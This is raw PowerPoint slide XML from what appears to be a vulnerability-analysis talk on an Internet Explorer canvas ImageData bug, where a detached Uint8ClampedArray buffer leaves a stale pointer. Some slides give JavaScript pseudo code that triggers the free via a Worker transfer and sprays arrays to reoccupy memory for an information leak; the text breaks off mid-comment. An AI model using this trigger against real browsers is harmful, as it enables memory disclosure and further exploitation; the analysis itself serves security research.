            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{351ECCA9-0997-45C5-A3E0-F9BE703BBAF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078126" y="6622432"/>
            <a:ext cx="5607595" cy="1918823"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="图片 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{431DFF57-C64B-4CFF-9C91-AE1856998DDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6706985" y="6622432"/>
            <a:ext cx="5324596" cy="1256365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="文本框 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE68B211-B046-4925-B7D0-02B6828F8C2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6685720" y="7911181"/>
            <a:ext cx="5324597" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After the function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CCanvasImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Var_type_constructor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is patched, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object will no longer save the buffer pointer of Unit8ClampArray.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="矩形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{651AE0FD-3CAB-4C3D-89B4-2DE39BD5BE87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8182085" y="7521515"/>
            <a:ext cx="1952515" cy="21988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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3463998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Vulnerability Analysis</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{940641E8-0D7E-45CC-9EC4-AD6C097A7FCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168400" y="4323183"/>
            <a:ext cx="10863180" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object is constructed, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dettach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the buffer of the Unit8ClampArray object. At this time, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object will still retain the pointer of Unit8ClampArray.buffer. When there is a function to operate the buffer memory area, the program may crash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If we can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dettach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the buffer of Unit8ClampArray, occupy the buffer, and then write the data to a location and then read it, there is a chance to cause information leak.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2051586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One</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{686D7149-BD03-42C6-BEBD-DAB706D9F1B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074141" y="5399881"/>
            <a:ext cx="11381258" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CanvasRenderingContext2D.getImageData()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3F01517-D398-4797-9777-B06994F65EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="7615261"/>
            <a:ext cx="11381258" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CanvasRenderingContext2D.putImageData()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12CFA6DF-F671-4921-8925-4411F98FDC35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074141" y="2550693"/>
            <a:ext cx="11381258" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is CanvasRenderingContext2D?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FC27344-C214-4F83-A5B4-38E2B3082E6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104816" y="3015732"/>
            <a:ext cx="10417047" cy="2363126"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5EC0CF6-4026-4B84-B2D6-962AE41DA324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074141" y="5832435"/>
            <a:ext cx="10417047" cy="1588807"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{102A4DE3-2041-4C90-99F0-597ADB58EC1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104816" y="8036874"/>
            <a:ext cx="10386372" cy="1803949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19101378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One</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B4527CB-86D8-4AB4-B78A-86C6F3FCB095}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2530927"/>
            <a:ext cx="10953455" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pseudo code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="85000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="SimHei" charset="-122"/>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{560ED58F-31DA-4C56-951E-5F5F0567B55E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="3073913"/>
            <a:ext cx="10953455" cy="6097383"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="2">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var canvas = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('canvas');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ctx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>canvas.getContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('2d', {alpha: false});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var ta = new Uint8ClampedArray(ab)			</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>imageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(ta, 0x80, 0x80);		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>w = new Worker(null);			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>w.postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("ok", [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ta.buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>w.terminate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>w = null;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CollectGarbage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for(var i=0;i&lt;0x80000;i++){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    zz[i] = new Array(0x10);  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nn-NO" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nn-NO" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nn-NO" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nn-NO" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Create a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TypedArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of Unit8ClampedArray</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nn-NO" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Create an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ImageData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> that references Unit8ClampedArray with a length and width of 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nn-NO" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nn-NO" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Release the buffer of the </a:t>
            </a:r>
            <a:r>
